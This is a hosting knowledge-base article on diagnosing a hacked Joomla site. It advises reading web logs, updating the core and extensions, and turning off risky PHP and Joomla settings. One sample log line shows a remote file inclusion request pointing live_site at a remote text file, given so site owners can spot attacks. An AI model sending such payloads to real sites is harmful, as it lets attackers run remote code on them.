My Joomla has been hacked!

If you suspect that your Joomla has been hacked, the first thing to check are the raw weblogs. Try searching them for suspicious client requests such as:

192.168.0.1 - - [29/Oct/2008:06:07:30 -0500] "GET /index.php?live_site=domain.com/1.txt?? HTTP/1.1" 200 10864 "-" "Firefox"


Unfortunately, it is not always that easy to find traces of a web attack and to decode it. Such a task may require an advanced developer to devote quite a lot of time. That's why you should know the most common reasons for a Joomla to be compromised:


1. The core Joomla installation is outdated. Previous versions have serious security vulnerabilities which can be easily exploited.


You can check your Joomla version by logging in your admin panel. There your current Joomla version will be specified.


In case your version is not the latest, you can follow this tutorial:


How to upgrade Joomla


2. Additionally installed components / modules are outdated.

This is a very common but, unfortunately, neglected problem. It is essential to keep track of all extra components / modules and make sure they are up to date. Check the addon's homepage for information about recent security issues and upgrade instructions.


3. Common misconfigurations which are known to open security holes:

-
register_globals turned on in PHP's configuration - if turned on this directive allows easy variable poisoning; make sure to turn it off;

- allow_url_include turned on in PHP's configuration - if turned on it allows remote code to be included in your scripts; make sure to turn it off;

- using the default table prefix _jos. This opens the door for all MySQL injections; make sure you change your table prefix to something harder to guess using this component;

- RG_EMULATION turned on in Joomla 1.0.* - this directive emulates register_globals locally, a dangerous option; if enabled, you will see a warning right after you log in to your Joomla admin panel; you can switch it off by adding somewhere in the middle of the configuration.php file:

if(!defined('RG_EMULATION')) { define( 'RG_EMULATION', 0 ); }

  • 0 Users Found This Useful
Was this answer helpful?

Related Articles

why joomla sites are hacked ?

Hi,you think you have been hacked? We will try to give you some help on how to proceed...

Things to do before your site gets hacked

Joomla! is often bashed by unknowledgeable people as insecure. How little they know! The fact...

How to secure your Joomla sites before they are hacked

I have written a post earlier about why you should keep your Joomla sites updated for safety...

Install Joomla using Fantastico

Install Joomla using websouls Fantastico   Fantastico can be found in your Rochen cPanel...

10 Reasons Why Your Joomla Website Got Hacked

We have at least 3 times every week where a customer comes to us with a hacked Joomla website....